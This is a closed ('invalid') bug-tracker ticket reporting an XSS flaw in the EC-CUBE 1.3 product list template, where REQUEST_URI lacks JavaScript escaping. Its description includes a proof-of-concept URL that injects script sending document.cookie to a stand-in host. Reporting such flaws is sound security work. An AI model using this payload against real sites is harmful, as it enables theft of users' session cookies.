Ticket #152 (closed bug report: invalid)

Opened 13 years ago

Last modified 12 years ago

XSS vulnerability in the product list

Reported by: adachi
Owned by: somebody
Priority:
Milestone: EC-CUBE
Component: Front
Version: 1.3 series
Keywords:
Cc:
Fixed:

Description

 http://demo.ec-cube.net/products/list.php?category_id=2'+window.open('http://www.example.com/?cookie='+document.cookie)+'

At lines 44 and 229 of html/user_data/templates/list.tpl, in

<!--{$smarty.server.REQUEST_URI|escape}-->

JavaScript escaping needs to be applied.

Change History

comment:1 Changed 12 years ago by takegami

  • Status changed from new to closed
  • Resolution set to invalid